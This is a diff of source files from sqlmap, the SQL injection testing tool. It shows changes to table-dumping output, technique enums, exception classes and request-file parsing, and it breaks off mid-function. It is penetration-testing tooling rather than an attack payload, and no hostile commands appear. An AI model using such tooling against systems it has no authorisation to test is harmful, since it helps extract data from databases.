||||||
|
|
||||||
|
@ -105,13 +105,22 @@ PGSQL_PRIVS = {
|
||||||
3: "catupd",
|
3: "catupd",
|
||||||
}
|
}
|
||||||
|
|
||||||
|
# Reference(s): http://stackoverflow.com/a/17672504
|
||||||
|
# http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES
|
||||||
|
|
||||||
FIREBIRD_PRIVS = {
|
FIREBIRD_PRIVS = {
|
||||||
"S": "SELECT",
|
"S": "SELECT",
|
||||||
"I": "INSERT",
|
"I": "INSERT",
|
||||||
"U": "UPDATE",
|
"U": "UPDATE",
|
||||||
"D": "DELETE",
|
"D": "DELETE",
|
||||||
"R": "REFERENCES",
|
"R": "REFERENCE",
|
||||||
"E": "EXECUTE",
|
"E": "EXECUTE",
|
||||||
|
"X": "EXECUTE",
|
||||||
|
"A": "ALL",
|
||||||
|
"M": "MEMBER",
|
||||||
|
"T": "DECRYPT",
|
||||||
|
"E": "ENCRYPT",
|
||||||
|
"B": "SUBSCRIBE",
|
||||||
}
|
}
|
||||||
|
|
||||||
DB2_PRIVS = {
|
DB2_PRIVS = {
|
||||||
|
@ -207,6 +216,7 @@ POST_HINT_CONTENT_TYPES = {
|
||||||
POST_HINT.MULTIPART: "multipart/form-data",
|
POST_HINT.MULTIPART: "multipart/form-data",
|
||||||
POST_HINT.SOAP: "application/soap+xml",
|
POST_HINT.SOAP: "application/soap+xml",
|
||||||
POST_HINT.XML: "application/xml",
|
POST_HINT.XML: "application/xml",
|
||||||
|
POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8",
|
||||||
}
|
}
|
||||||
|
|
||||||
DEPRECATED_OPTIONS = {
|
DEPRECATED_OPTIONS = {
|
||||||
|
@ -214,6 +224,7 @@ DEPRECATED_OPTIONS = {
|
||||||
"--no-unescape": "use '--no-escape' instead",
|
"--no-unescape": "use '--no-escape' instead",
|
||||||
"--binary": "use '--binary-fields' instead",
|
"--binary": "use '--binary-fields' instead",
|
||||||
"--check-payload": None,
|
"--check-payload": None,
|
||||||
|
"--check-waf": None,
|
||||||
}
|
}
|
||||||
|
|
||||||
DUMP_DATA_PREPROCESS = {
|
DUMP_DATA_PREPROCESS = {
|
||||||
|
|
|
@ -1,14 +1,15 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import cgi
|
import cgi
|
||||||
import codecs
|
import hashlib
|
||||||
import os
|
import os
|
||||||
import re
|
import re
|
||||||
|
import tempfile
|
||||||
import threading
|
import threading
|
||||||
|
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
|
@ -21,6 +22,7 @@ from lib.core.common import openFile
|
||||||
from lib.core.common import prioritySortColumns
|
from lib.core.common import prioritySortColumns
|
||||||
from lib.core.common import randomInt
|
from lib.core.common import randomInt
|
||||||
from lib.core.common import safeCSValue
|
from lib.core.common import safeCSValue
|
||||||
|
from lib.core.common import unicodeencode
|
||||||
from lib.core.common import unsafeSQLIdentificatorNaming
|
from lib.core.common import unsafeSQLIdentificatorNaming
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
|
@ -32,12 +34,15 @@ from lib.core.enums import DBMS
|
||||||
from lib.core.enums import DUMP_FORMAT
|
from lib.core.enums import DUMP_FORMAT
|
||||||
from lib.core.exception import SqlmapGenericException
|
from lib.core.exception import SqlmapGenericException
|
||||||
from lib.core.exception import SqlmapValueException
|
from lib.core.exception import SqlmapValueException
|
||||||
|
from lib.core.exception import SqlmapSystemException
|
||||||
from lib.core.replication import Replication
|
from lib.core.replication import Replication
|
||||||
from lib.core.settings import HTML_DUMP_CSS_STYLE
|
from lib.core.settings import HTML_DUMP_CSS_STYLE
|
||||||
|
from lib.core.settings import IS_WIN
|
||||||
from lib.core.settings import METADB_SUFFIX
|
from lib.core.settings import METADB_SUFFIX
|
||||||
from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
|
from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
|
||||||
from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
|
from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
|
||||||
from lib.core.settings import UNICODE_ENCODING
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
|
from lib.core.settings import WINDOWS_RESERVED_NAMES
|
||||||
from thirdparty.magic import magic
|
from thirdparty.magic import magic
|
||||||
|
|
||||||
from extra.safe2bin.safe2bin import safechardecode
|
from extra.safe2bin.safe2bin import safechardecode
|
||||||
|
@ -66,19 +71,30 @@ class Dump(object):
|
||||||
if kb.get("multiThreadMode"):
|
if kb.get("multiThreadMode"):
|
||||||
self._lock.acquire()
|
self._lock.acquire()
|
||||||
|
|
||||||
|
try:
|
||||||
self._outputFP.write(text)
|
self._outputFP.write(text)
|
||||||
|
except IOError, ex:
|
||||||
|
errMsg = "error occurred while writing to log file ('%s')" % ex.message
|
||||||
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
if kb.get("multiThreadMode"):
|
if kb.get("multiThreadMode"):
|
||||||
self._lock.release()
|
self._lock.release()
|
||||||
|
|
||||||
kb.dataOutputFlag = True
|
kb.dataOutputFlag = True
|
||||||
|
|
||||||
|
def flush(self):
|
||||||
|
if self._outputFP:
|
||||||
|
try:
|
||||||
|
self._outputFP.flush()
|
||||||
|
except IOError:
|
||||||
|
pass
|
||||||
|
|
||||||
def setOutputFile(self):
|
def setOutputFile(self):
|
||||||
self._outputFile = os.path.join(conf.outputPath, "log")
|
self._outputFile = os.path.join(conf.outputPath, "log")
|
||||||
try:
|
try:
|
||||||
self._outputFP = codecs.open(self._outputFile, "ab" if not conf.flushSession else "wb", UNICODE_ENCODING)
|
self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb")
|
||||||
except IOError, ex:
|
except IOError, ex:
|
||||||
errMsg = "error occurred while opening log file ('%s')" % ex
|
errMsg = "error occurred while opening log file ('%s')" % ex.message
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
def getOutputFile(self):
|
def getOutputFile(self):
|
||||||
|
@ -367,6 +383,7 @@ class Dump(object):
|
||||||
rtable = None
|
rtable = None
|
||||||
dumpFP = None
|
dumpFP = None
|
||||||
appendToFile = False
|
appendToFile = False
|
||||||
|
warnFile = False
|
||||||
|
|
||||||
if tableValues is None:
|
if tableValues is None:
|
||||||
return
|
return
|
||||||
|
@ -380,15 +397,45 @@ class Dump(object):
|
||||||
self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE)
|
self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE)
|
||||||
return
|
return
|
||||||
|
|
||||||
dumpDbPath = os.path.join(conf.dumpPath, re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
|
_ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(db)))
|
||||||
|
if len(_) < len(db) or IS_WIN and db.upper() in WINDOWS_RESERVED_NAMES:
|
||||||
|
_ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
|
||||||
|
dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8]))
|
||||||
|
warnFile = True
|
||||||
|
else:
|
||||||
|
dumpDbPath = os.path.join(conf.dumpPath, _)
|
||||||
|
|
||||||
if conf.dumpFormat == DUMP_FORMAT.SQLITE:
|
if conf.dumpFormat == DUMP_FORMAT.SQLITE:
|
||||||
replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db)))
|
replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db)))
|
||||||
elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
|
elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
|
||||||
if not os.path.isdir(dumpDbPath):
|
if not os.path.isdir(dumpDbPath):
|
||||||
|
try:
|
||||||
os.makedirs(dumpDbPath, 0755)
|
os.makedirs(dumpDbPath, 0755)
|
||||||
|
except (OSError, IOError), ex:
|
||||||
|
try:
|
||||||
|
tempDir = tempfile.mkdtemp(prefix="sqlmapdb")
|
||||||
|
except IOError, _:
|
||||||
|
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||||
|
errMsg += "Please make sure that your disk is not full and "
|
||||||
|
errMsg += "that you have sufficient write permissions to "
|
||||||
|
errMsg += "create temporary files and/or directories"
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
|
warnMsg = "unable to create dump directory "
|
||||||
|
warnMsg += "'%s' (%s). " % (dumpDbPath, ex)
|
||||||
|
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
dumpDbPath = tempDir
|
||||||
|
|
||||||
|
_ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
|
||||||
|
if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES:
|
||||||
|
_ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table)))
|
||||||
|
dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower()))
|
||||||
|
warnFile = True
|
||||||
|
else:
|
||||||
|
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
|
||||||
|
|
||||||
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))
|
|
||||||
appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop))
|
appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop))
|
||||||
dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab")
|
dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab")
|
||||||
|
|
||||||
|
@ -574,7 +621,12 @@ class Dump(object):
|
||||||
else:
|
else:
|
||||||
dataToDumpFile(dumpFP, "\n")
|
dataToDumpFile(dumpFP, "\n")
|
||||||
dumpFP.close()
|
dumpFP.close()
|
||||||
logger.info("table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName))
|
|
||||||
|
msg = "table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName)
|
||||||
|
if not warnFile:
|
||||||
|
logger.info(msg)
|
||||||
|
else:
|
||||||
|
logger.warn(msg)
|
||||||
|
|
||||||
def dbColumns(self, dbColumnsDict, colConsider, dbs):
|
def dbColumns(self, dbColumnsDict, colConsider, dbs):
|
||||||
if hasattr(conf, "api"):
|
if hasattr(conf, "api"):
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -74,6 +74,7 @@ class POST_HINT:
|
||||||
JSON_LIKE = "JSON-like"
|
JSON_LIKE = "JSON-like"
|
||||||
MULTIPART = "MULTIPART"
|
MULTIPART = "MULTIPART"
|
||||||
XML = "XML (generic)"
|
XML = "XML (generic)"
|
||||||
|
ARRAY_LIKE = "Array-like"
|
||||||
|
|
||||||
class HTTPMETHOD:
|
class HTTPMETHOD:
|
||||||
GET = "GET"
|
GET = "GET"
|
||||||
|
@ -165,6 +166,7 @@ class HTTP_HEADER:
|
||||||
COOKIE = "Cookie"
|
COOKIE = "Cookie"
|
||||||
SET_COOKIE = "Set-Cookie"
|
SET_COOKIE = "Set-Cookie"
|
||||||
HOST = "Host"
|
HOST = "Host"
|
||||||
|
LOCATION = "Location"
|
||||||
PRAGMA = "Pragma"
|
PRAGMA = "Pragma"
|
||||||
PROXY_AUTHORIZATION = "Proxy-Authorization"
|
PROXY_AUTHORIZATION = "Proxy-Authorization"
|
||||||
PROXY_CONNECTION = "Proxy-Connection"
|
PROXY_CONNECTION = "Proxy-Connection"
|
||||||
|
@ -206,10 +208,10 @@ class PAYLOAD:
|
||||||
SQLINJECTION = {
|
SQLINJECTION = {
|
||||||
1: "boolean-based blind",
|
1: "boolean-based blind",
|
||||||
2: "error-based",
|
2: "error-based",
|
||||||
3: "UNION query",
|
3: "inline query",
|
||||||
4: "stacked queries",
|
4: "stacked queries",
|
||||||
5: "AND/OR time-based blind",
|
5: "AND/OR time-based blind",
|
||||||
6: "inline query",
|
6: "UNION query",
|
||||||
}
|
}
|
||||||
|
|
||||||
PARAMETER = {
|
PARAMETER = {
|
||||||
|
@ -248,10 +250,10 @@ class PAYLOAD:
|
||||||
class TECHNIQUE:
|
class TECHNIQUE:
|
||||||
BOOLEAN = 1
|
BOOLEAN = 1
|
||||||
ERROR = 2
|
ERROR = 2
|
||||||
UNION = 3
|
QUERY = 3
|
||||||
STACKED = 4
|
STACKED = 4
|
||||||
TIME = 5
|
TIME = 5
|
||||||
QUERY = 6
|
UNION = 6
|
||||||
|
|
||||||
class WHERE:
|
class WHERE:
|
||||||
ORIGINAL = 1
|
ORIGINAL = 1
|
||||||
|
@ -338,3 +340,8 @@ class AUTH_TYPE:
|
||||||
DIGEST = "digest"
|
DIGEST = "digest"
|
||||||
NTLM = "ntlm"
|
NTLM = "ntlm"
|
||||||
PKI = "pki"
|
PKI = "pki"
|
||||||
|
|
||||||
|
class AUTOCOMPLETE_TYPE:
|
||||||
|
SQL = 0
|
||||||
|
OS = 1
|
||||||
|
SQLMAP = 2
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -23,6 +23,9 @@ class SqlmapFilePathException(SqlmapBaseException):
|
||||||
class SqlmapGenericException(SqlmapBaseException):
|
class SqlmapGenericException(SqlmapBaseException):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapInstallationException(SqlmapBaseException):
|
||||||
|
pass
|
||||||
|
|
||||||
class SqlmapMissingDependence(SqlmapBaseException):
|
class SqlmapMissingDependence(SqlmapBaseException):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
@ -44,12 +47,21 @@ class SqlmapSilentQuitException(SqlmapBaseException):
|
||||||
class SqlmapUserQuitException(SqlmapBaseException):
|
class SqlmapUserQuitException(SqlmapBaseException):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapShellQuitException(SqlmapBaseException):
|
||||||
|
pass
|
||||||
|
|
||||||
class SqlmapSyntaxException(SqlmapBaseException):
|
class SqlmapSyntaxException(SqlmapBaseException):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapSystemException(SqlmapBaseException):
|
||||||
|
pass
|
||||||
|
|
||||||
class SqlmapThreadException(SqlmapBaseException):
|
class SqlmapThreadException(SqlmapBaseException):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
class SqlmapTokenException(SqlmapBaseException):
|
||||||
|
pass
|
||||||
|
|
||||||
class SqlmapUndefinedMethod(SqlmapBaseException):
|
class SqlmapUndefinedMethod(SqlmapBaseException):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -41,4 +41,4 @@ FORMATTER = logging.Formatter("\r[%(asctime)s] [%(levelname)s] %(message)s", "%H
|
||||||
|
|
||||||
LOGGER_HANDLER.setFormatter(FORMATTER)
|
LOGGER_HANDLER.setFormatter(FORMATTER)
|
||||||
LOGGER.addHandler(LOGGER_HANDLER)
|
LOGGER.addHandler(LOGGER_HANDLER)
|
||||||
LOGGER.setLevel(logging.WARN)
|
LOGGER.setLevel(logging.INFO)
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -9,12 +9,14 @@ import cookielib
|
||||||
import glob
|
import glob
|
||||||
import inspect
|
import inspect
|
||||||
import logging
|
import logging
|
||||||
|
import httplib
|
||||||
import os
|
import os
|
||||||
import random
|
import random
|
||||||
import re
|
import re
|
||||||
import socket
|
import socket
|
||||||
import string
|
import string
|
||||||
import sys
|
import sys
|
||||||
|
import tempfile
|
||||||
import threading
|
import threading
|
||||||
import time
|
import time
|
||||||
import urllib2
|
import urllib2
|
||||||
|
@ -51,7 +53,7 @@ from lib.core.common import readCachedFileContent
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
from lib.core.common import resetCookieJar
|
from lib.core.common import resetCookieJar
|
||||||
from lib.core.common import runningAsAdmin
|
from lib.core.common import runningAsAdmin
|
||||||
from lib.core.common import sanitizeStr
|
from lib.core.common import safeExpandUser
|
||||||
from lib.core.common import setOptimize
|
from lib.core.common import setOptimize
|
||||||
from lib.core.common import setPaths
|
from lib.core.common import setPaths
|
||||||
from lib.core.common import singleTimeWarnMessage
|
from lib.core.common import singleTimeWarnMessage
|
||||||
|
@ -84,47 +86,41 @@ from lib.core.enums import WIZARD
|
||||||
from lib.core.exception import SqlmapConnectionException
|
from lib.core.exception import SqlmapConnectionException
|
||||||
from lib.core.exception import SqlmapFilePathException
|
from lib.core.exception import SqlmapFilePathException
|
||||||
from lib.core.exception import SqlmapGenericException
|
from lib.core.exception import SqlmapGenericException
|
||||||
|
from lib.core.exception import SqlmapInstallationException
|
||||||
from lib.core.exception import SqlmapMissingDependence
|
from lib.core.exception import SqlmapMissingDependence
|
||||||
from lib.core.exception import SqlmapMissingMandatoryOptionException
|
from lib.core.exception import SqlmapMissingMandatoryOptionException
|
||||||
from lib.core.exception import SqlmapMissingPrivileges
|
from lib.core.exception import SqlmapMissingPrivileges
|
||||||
from lib.core.exception import SqlmapSilentQuitException
|
from lib.core.exception import SqlmapSilentQuitException
|
||||||
from lib.core.exception import SqlmapSyntaxException
|
from lib.core.exception import SqlmapSyntaxException
|
||||||
|
from lib.core.exception import SqlmapSystemException
|
||||||
from lib.core.exception import SqlmapUnsupportedDBMSException
|
from lib.core.exception import SqlmapUnsupportedDBMSException
|
||||||
from lib.core.exception import SqlmapUserQuitException
|
from lib.core.exception import SqlmapUserQuitException
|
||||||
from lib.core.log import FORMATTER
|
from lib.core.log import FORMATTER
|
||||||
from lib.core.optiondict import optDict
|
from lib.core.optiondict import optDict
|
||||||
from lib.core.settings import ACCESS_ALIASES
|
|
||||||
from lib.core.settings import BURP_REQUEST_REGEX
|
from lib.core.settings import BURP_REQUEST_REGEX
|
||||||
from lib.core.settings import BURP_XML_HISTORY_REGEX
|
from lib.core.settings import BURP_XML_HISTORY_REGEX
|
||||||
from lib.core.settings import CODECS_LIST_PAGE
|
from lib.core.settings import CODECS_LIST_PAGE
|
||||||
from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
|
from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
|
||||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||||
from lib.core.settings import DB2_ALIASES
|
from lib.core.settings import DBMS_ALIASES
|
||||||
from lib.core.settings import DEFAULT_PAGE_ENCODING
|
from lib.core.settings import DEFAULT_PAGE_ENCODING
|
||||||
from lib.core.settings import DEFAULT_TOR_HTTP_PORTS
|
from lib.core.settings import DEFAULT_TOR_HTTP_PORTS
|
||||||
from lib.core.settings import DEFAULT_TOR_SOCKS_PORT
|
from lib.core.settings import DEFAULT_TOR_SOCKS_PORT
|
||||||
from lib.core.settings import DUMMY_URL
|
from lib.core.settings import DUMMY_URL
|
||||||
from lib.core.settings import FIREBIRD_ALIASES
|
|
||||||
from lib.core.settings import INJECT_HERE_MARK
|
from lib.core.settings import INJECT_HERE_MARK
|
||||||
from lib.core.settings import IS_WIN
|
from lib.core.settings import IS_WIN
|
||||||
from lib.core.settings import KB_CHARS_BOUNDARY_CHAR
|
from lib.core.settings import KB_CHARS_BOUNDARY_CHAR
|
||||||
|
from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET
|
||||||
from lib.core.settings import LOCALHOST
|
from lib.core.settings import LOCALHOST
|
||||||
from lib.core.settings import MAXDB_ALIASES
|
|
||||||
from lib.core.settings import MAX_CONNECT_RETRIES
|
from lib.core.settings import MAX_CONNECT_RETRIES
|
||||||
from lib.core.settings import MAX_NUMBER_OF_THREADS
|
from lib.core.settings import MAX_NUMBER_OF_THREADS
|
||||||
from lib.core.settings import MSSQL_ALIASES
|
|
||||||
from lib.core.settings import MYSQL_ALIASES
|
|
||||||
from lib.core.settings import NULL
|
from lib.core.settings import NULL
|
||||||
from lib.core.settings import ORACLE_ALIASES
|
|
||||||
from lib.core.settings import PARAMETER_SPLITTING_REGEX
|
from lib.core.settings import PARAMETER_SPLITTING_REGEX
|
||||||
from lib.core.settings import PGSQL_ALIASES
|
|
||||||
from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
|
from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
|
||||||
from lib.core.settings import SITE
|
from lib.core.settings import SITE
|
||||||
from lib.core.settings import SQLITE_ALIASES
|
|
||||||
from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX
|
from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX
|
||||||
from lib.core.settings import SUPPORTED_DBMS
|
from lib.core.settings import SUPPORTED_DBMS
|
||||||
from lib.core.settings import SUPPORTED_OS
|
from lib.core.settings import SUPPORTED_OS
|
||||||
from lib.core.settings import SYBASE_ALIASES
|
|
||||||
from lib.core.settings import TIME_DELAY_CANDIDATES
|
from lib.core.settings import TIME_DELAY_CANDIDATES
|
||||||
from lib.core.settings import UNION_CHAR_REGEX
|
from lib.core.settings import UNION_CHAR_REGEX
|
||||||
from lib.core.settings import UNKNOWN_DBMS_VERSION
|
from lib.core.settings import UNKNOWN_DBMS_VERSION
|
||||||
|
@ -134,6 +130,7 @@ from lib.core.settings import WEBSCARAB_SPLITTER
|
||||||
from lib.core.threads import getCurrentThreadData
|
from lib.core.threads import getCurrentThreadData
|
||||||
from lib.core.update import update
|
from lib.core.update import update
|
||||||
from lib.parse.configfile import configFileParser
|
from lib.parse.configfile import configFileParser
|
||||||
|
from lib.parse.payloads import loadBoundaries
|
||||||
from lib.parse.payloads import loadPayloads
|
from lib.parse.payloads import loadPayloads
|
||||||
from lib.parse.sitemap import parseSitemap
|
from lib.parse.sitemap import parseSitemap
|
||||||
from lib.request.basic import checkCharEncoding
|
from lib.request.basic import checkCharEncoding
|
||||||
|
@ -228,7 +225,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
||||||
|
|
||||||
if not(conf.scope and not re.search(conf.scope, url, re.I)):
|
if not(conf.scope and not re.search(conf.scope, url, re.I)):
|
||||||
if not kb.targets or url not in addedTargetUrls:
|
if not kb.targets or url not in addedTargetUrls:
|
||||||
kb.targets.add((url, method, None, cookie))
|
kb.targets.add((url, method, None, cookie, None))
|
||||||
addedTargetUrls.add(url)
|
addedTargetUrls.add(url)
|
||||||
|
|
||||||
def _parseBurpLog(content):
|
def _parseBurpLog(content):
|
||||||
|
@ -242,7 +239,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
||||||
for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S):
|
for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S):
|
||||||
port, request = match.groups()
|
port, request = match.groups()
|
||||||
request = request.decode("base64")
|
request = request.decode("base64")
|
||||||
_ = re.search(r"%s:.+" % HTTP_HEADER.HOST, request)
|
_ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request)
|
||||||
if _:
|
if _:
|
||||||
host = _.group(0).strip()
|
host = _.group(0).strip()
|
||||||
if not re.search(r":\d+\Z", host):
|
if not re.search(r":\d+\Z", host):
|
||||||
|
@ -280,6 +277,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
||||||
params = False
|
params = False
|
||||||
newline = None
|
newline = None
|
||||||
lines = request.split('\n')
|
lines = request.split('\n')
|
||||||
|
headers = []
|
||||||
|
|
||||||
for index in xrange(len(lines)):
|
for index in xrange(len(lines)):
|
||||||
line = lines[index]
|
line = lines[index]
|
||||||
|
@ -291,7 +289,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
||||||
line = line.strip('\r')
|
line = line.strip('\r')
|
||||||
match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None
|
match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None
|
||||||
|
|
||||||
if len(line) == 0 and method in (HTTPMETHOD.POST, HTTPMETHOD.PUT) and data is None:
|
if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None:
|
||||||
data = ""
|
data = ""
|
||||||
params = True
|
params = True
|
||||||
|
|
||||||
|
@ -329,14 +327,14 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
||||||
port = filterStringValue(splitValue[1], "[0-9]")
|
port = filterStringValue(splitValue[1], "[0-9]")
|
||||||
|
|
||||||
# Avoid to add a static content length header to
|
# Avoid to add a static content length header to
|
||||||
# conf.httpHeaders and consider the following lines as
|
# headers and consider the following lines as
|
||||||
# POSTed data
|
# POSTed data
|
||||||
if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
|
if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
|
||||||
params = True
|
params = True
|
||||||
|
|
||||||
# Avoid proxy and connection type related headers
|
# Avoid proxy and connection type related headers
|
||||||
elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION):
|
elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION):
|
||||||
conf.httpHeaders.append((getUnicode(key), getUnicode(value)))
|
headers.append((getUnicode(key), getUnicode(value)))
|
||||||
|
|
||||||
if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""):
|
if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""):
|
||||||
params = True
|
params = True
|
||||||
|
@ -364,12 +362,17 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
||||||
|
|
||||||
if not(conf.scope and not re.search(conf.scope, url, re.I)):
|
if not(conf.scope and not re.search(conf.scope, url, re.I)):
|
||||||
if not kb.targets or url not in addedTargetUrls:
|
if not kb.targets or url not in addedTargetUrls:
|
||||||
kb.targets.add((url, method, data, cookie))
|
kb.targets.add((url, method, data, cookie, tuple(headers)))
|
||||||
addedTargetUrls.add(url)
|
addedTargetUrls.add(url)
|
||||||
|
|
||||||
fp = openFile(reqFile, "rb")
|
checkFile(reqFile)
|
||||||
|
try:
|
||||||
content = fp.read()
|
with openFile(reqFile, "rb") as f:
|
||||||
|
content = f.read()
|
||||||
|
except (IOError, OSError, MemoryError), ex:
|
||||||
|
errMsg = "something went wrong while trying "
|
||||||
|
errMsg += "to read the content of file '%s' ('%s')" % (reqFile, ex)
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
if conf.scope:
|
if conf.scope:
|
||||||
logger.info("using regular expression '%s' for filtering targets" % conf.scope)
|
logger.info("using regular expression '%s' for filtering targets" % conf.scope)
|
||||||
|
@ -409,7 +412,13 @@ def _loadQueries():
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
tree = ElementTree()
|
tree = ElementTree()
|
||||||
|
try:
|
||||||
tree.parse(paths.QUERIES_XML)
|
tree.parse(paths.QUERIES_XML)
|
||||||
|
except Exception, ex:
|
||||||
|
errMsg = "something seems to be wrong with "
|
||||||
|
errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, ex)
|
||||||
|
errMsg += "sure that you haven't made any changes to it"
|
